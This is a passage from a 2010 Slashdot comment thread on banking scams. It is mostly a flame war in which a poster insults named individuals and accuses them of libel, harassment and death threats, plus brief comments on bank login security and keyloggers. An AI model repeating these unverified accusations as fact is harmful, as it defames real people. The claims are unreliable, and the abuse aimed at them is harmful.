P.S.=> Others realize that /. OFTEN "follows its own agenda", but their favorite color MUST BE 'TRANSPARENT', because as the saying goes, "it's ALL about the 'benjamins'", & perhaps /. feels that B. Krebs (because of the sites he is "affiliated with" are more largely travelled than is scamdetect's, but in the end, it turns up that Krebs is no more qualified as a valid expert on this subject matter than is scamdetect (and neither Krebs nor scamdetect are the original discoverers of this news' topic either, mind you - they're only both relaying it to the rest of us is all, so imo @ least? BOTH sources should be cited, out of fairness, if anything - that's all!))... apk
Re:Where's your "LOGIC" (illogic is more like it) by jwl17330536 · 2010-05-26 08:39 · Score: 1

At least his name carries a lot of weight: http://www.jeremyreimer.com/phpbb2/viewtopic.php?t=4128 and http://www.thorschrock.com/2008/05/19/how-to-respond-when-people-threaten-to-sue-you-on-the-web/
THOR SCHMUCK & CA? Take a read... lmao! by Anonymous Coward · 2010-05-26 13:12 · Score: 0

"THOR SCHMUCK"? LMAO, well, people can read there, and see that he refused to answer my points there when I replied (on PING.EXE, SPYBOT SEARCH & DESTROY, & MORE)
He is, afaik, the one that submitted my app to CA as a malware (& it's not intended for that kind of use, I wrote it in good faith for a forums guy that wanted a way to launch OLD Apache server for Windows like a service, invisibly, & since that's only 1-2 lines of code to do? I did!).
CA, now there's a story. Ask Computer Associates about their being caught in a millions of dollars financial/accounting scam, here:
http://www.associatedcontent.com/article/215116/computer_associates_cofounder_led_22.html
Real reputable company, eh?
In fact, I passed every single one of the 21 questions for removal of my ware from their site, & all they ended up doing was lowering it down to a "zero threat level"... but, I'm not too concerned about it, because they also do it to others (along with other Antivirus/Antispyware companies, and we all know how "effective" those are, especially lately vs. today's "blended threats").
Ask Dr. Mark Russinovich of Microsoft or Nir Softer of NIRSOFT if they've ever had their numerous apps libeled along with themselves in the same manner... (answer = they have, so I suppose I am in "good company" here, eh?)
Thor Schrock, lol, another "credible expert" (NOT): That guy doesn't even have a CSC degree or even a single A+ type certification to his name.
APK
P.S.=> All I can say to and about Thor SCHMUCK, is this: GOD BLESS TY TYMKOVICH (LOL, run that by him, it ought to be good for a laugh... the fool got wickedly SUCKERED by him to the tune of $5,500)... apk
THOR "SCHMUCK" & NOT-MAN #1, JEREMY REIMER? by Anonymous Coward · 2010-05-26 13:25 · Score: 0

"THOR SCHMUCK"? LMAO, well, people can read there, and see that he refused to answer my points there when I replied (on PING.EXE, SPYBOT SEARCH & DESTROY, & MORE)
He is, afaik, the one that submitted my app to CA as a malware (& it's not intended for that kind of use, I wrote it in good faith for a forums guy that wanted a way to launch OLD Apache server for Windows like a service, invisibly, & since that's only 1-2 lines of code to do? I did!).
CA, now there's a story. Ask Computer Associates about their being caught in a millions of dollars financial/accounting scam, here:
http://www.associatedcontent.com/article/215116/computer_associates_cofounder_led_22.html
Real reputable company, eh?
In fact, I passed every single one of the 21 questions for removal of my ware from their site, & all they ended up doing was lowering it down to a "zero threat level"... but, I'm not too concerned about it, because they also do it to others (along with other Antivirus/Antispyware companies, and we all know how "effective" those are, especially lately vs. today's "blended threats").
Ask Dr. Mark Russinovich of Microsoft or Nir Softer of NIRSOFT if they've ever had their numerous apps libeled along with themselves in the same manner... (answer = they have, so I suppose I am in "good company" here, eh?)
Thor Schrock, lol, another "credible expert" (NOT): That guy doesn't even have a CSC degree or even a single A+ type certification to his name.
All I can say to and about Thor SCHMUCK, is this: GOD BLESS TY TYMKOVICH (LOL, run that by him, it ought to be good for a laugh... the fool got wickedly SUCKERED by him to the tune of $5,500)...
----
JEREMY REIMER??
He got caught by his ISP, Shaw in Canada, for email harassing me as well as impersonating me on his website (along with death threats from he & his pal Jay Little which ended up with a detective Felton in B.C. Canada where Reimer lives taking care of the rest for me).
LOL, Reimer's SO UNQUALIIED, he had to try to bring others, much to his own dismay... especially Fat Jay Little!
Jay Little, who claimed to be an "Exchange Expert" @ Windows IT Pro forums, and when I showed him that MICROSOFT'S OWN DOCUMENTATION PROVED THAT MEMORY OPTIMIZERS COULD RESTART A STALLED EXCHANGE SERVER? Jay Little had to eat his own "self-proclaimed" expert status on Exchange, and left in shame... but, not without stalking me to NTCompatible.com, & getting himself banned there (as he has been at Microsoft's Channel 9 before also for similar stupidities), but also blowing it AGAIN, badly, on ramdisk and their uses plus windows crash dump analysis messages determinations too...
Big comedy & "too, Too, TOO EASY" for me!
This in turn, ended up with death threats from Reimer and Little on their websites, and ended up with CrystalTech.com removing Jay Little's website IN ITS ENTIRETY (forcing him to lol, find another hosting provider) and portions of Reimer's site also being forcibly removed... after Reimer libeled me, made threats to me, and far more.
APK
P.S.=> So much for your "links", because you're only helping me show those 2 as the undereducated & blatantly unqualified FOOLS they are in this art & science! Thank you in fact... Additionally, thank you for showing us all, AGAIN, that slashdot & its cronies like you, are just not THAT GOOD @ picking "experts" (just like this posts use of B. Krebs of the post submitters source, scamdetect, & the editors here doing that blunder VERY UNPROFESSIONALLY in their editing no less)... apk
CmdrTaco's site can die just like others have by Anonymous Coward · 2010-05-26 13:38 · Score: 0

See subject-line, because it's what starts to kill forums when owners or their moderators begin abusing their viewership or news posters. It's happened before, and can happen again (here too, this place is not by any means unique on that account). When site editors and such begin doing what many others noted here as very unprofessional editorial work, that website usually starts to die or is on the way there already.
Simple Solution by Anonymous Coward · 2010-05-26 21:55 · Score: 0

http://noscript.net/ for every site you don't explicitly trust
You're also a HYPOCRITE, see inside... apk by Anonymous Coward · 2010-05-27 08:09 · Score: 0

"No one here knows the entire story and making judgement to the otherwise is sad." - by jwl17330536 on Monday April 05, @04:54PM (#31740740)
You've said it yourself, and shot yourself down on the SAME grounds, and were shown in that same type of error here:
http://it.slashdot.org/comments.pl?sid=1664046&cid=32356452
and, here:
http://it.slashdot.org/comments.pl?sid=1664046&cid=32356288
So, thanks for only showing you're obviously yet another one of the types you yourself dislike, and that you're also a hypocrite.
(That's the hilarious part here: You "almighty registered users" here often fail to realize that your own posting histories and words can often be used against you to show you just have your "convenient views and convictions" when they suit you, and that you often 'flip the script' on them, when it suits you also)
APK
P.S.=> Additionally, by your use of the falsehoods you yourself used without your knowing the entire story (though it was there for you to read in Thor SCHMUCK's posting)? You've also helped my case (and I have a winning one per an attorney out of Rochester N.Y., vs. CA & Thor Schrock to the tune of $150,000 U.S. Dollars) you've also shown that others are believing their misleading libel of myself... apk
You're a HYPOCRITE, step inside... apk by Anonymous Coward · 2010-05-27 08:43 · Score: 0

"No one here knows the entire story and making judgement to the otherwise is sad." - by jwl17330536 on Monday April 05, @04:54PM (#31740740)
You've said it yourself, and shot yourself down on the SAME grounds, and were shown in that same type of error here:
http://it.slashdot.org/comments.pl?sid=1664046&cid=32356452
and, here:
http://it.slashdot.org/comments.pl?sid=1664046&cid=32356288
So, thanks for only showing you're obviously yet another one of the types you yourself dislike, and that you're also a hypocrite.
(That's the hilarious part here: You "almighty registered users" here often fail to realize that your own posting histories and words can often be used against you to show you just have your "convenient views and convictions" when they suit you, and that you often 'flip the script' on them, when it suits you also)
APK
P.S.=> Additionally, by your use of the falsehoods you yourself used without your knowing the entire story (though it was there for you to read in Thor SCHMUCK's posting)? You've also helped my case (and I have a winning one per an attorney out of Rochester N.Y., vs. CA & Thor Schrock to the tune of $150,000 U.S. Dollars) you've also shown that others are believing their misleading libel of myself... apk
Really good bank security by Keybounce · 2010-05-30 09:25 · Score: 1

My bank has what I consider to be really good security.
My login page just asks for my account number.
Then, the bank proves who it is to me -- by showing me a picture of my choosing and a passphrase of my choosing -- before it asks me for my password.
In other words, before it asks me to give a secret away, it verifies itself with a secret.
As if that weren't good enough, on any browser that I haven't registered, it gives me a challenge question. So, to fake this, even if the scammer managed to get my account name and password, it doesn't have the browser credential, and can't get past the security question; it can't pretend to be my bank because it doesn't know my picture and passphrase (only delivered over SSL), etc.
To clarify: I give my account number. If it is playing MITM, it gets a challenge question, which it can't answer and I know is invalid if it passes it to me; if it wants to bypass that and just ask for my password, it doesn't know what image/phrase to show; it can't play transparent MITM and watch because of SSL security and lack of browser private key credential. That's the best security I've seen so far. Just fails to keylogging software, but that's what a PPC mac is for :-).
False sense of security by gr8dude · 2010-06-05 18:18 · Score: 1

I have taken to using the on-screen keyboard so that I can enter with mouseclicks rather than keypresses if I'm on an untrusted machine, but other than that I can't do much else.
A mini-remark: typing stuff on an on-screen keyboard will not help you.
Of course, it depends on the type of keyboard you are using and on the platform, but for instance - Windows' osk.exe (the default one) works by sending WM_KEYUP and WM_KEYDOWN messages to an input window.
A keylogger that uses hooks to watch messages sent to that window will still see the keystrokes.
You can try this hint: http://www.lazybit.com/index.php/a/2007/03/01/free_keylogger_protection It will confuse the person who reads the log, but it makes the data entry procedure much longer and error-prone.
p.s. keystrokes typed inside a virtual machine can also be grabbed, as the host OS "sees" them first, and that's where the keylogger is.

--
The saddest poem